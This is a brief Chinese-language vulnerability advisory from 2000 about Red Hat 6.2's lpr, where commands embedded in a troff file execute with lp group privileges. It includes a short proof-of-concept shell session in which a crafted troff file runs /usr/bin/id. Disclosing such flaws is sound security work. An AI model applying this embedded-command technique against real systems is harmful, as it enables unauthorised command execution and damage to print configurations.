RedHat lpr可执行任意命令漏洞发布时间:2000-10-26 更新时间:2000-10-26 严重程度:中 威胁程度:普通用户访问权限 错误类型:设计错误 利用方式:服务器模式 受影响系统 BSD lpr 0.54-4详细描述 lpr是UNIX的打印工具,在REDHAT 6.2中lpr存在漏洞允许以lp的组身份执行任意 命令。漏洞问题是在处理troff文件,他们转化为postscript时候产生的。当处理 时,嵌在troff文件里面的命令可以被执行,这个导致lpr配置文件破坏。 测试代码 [zen@continuity /tmp]$ cat asdf PS sh D/usr/bin/id>/tmp/yougetanyideasyetD .PF [zen@continuity /tmp]$ lpr asdf [zen@continuity /tmp]$ cat /tmp/yougetanyideasyet uid=500(zen) gid=500(zen) groups=7(lp) 解决方案 暂时关闭lpr程序。 相关信息 |
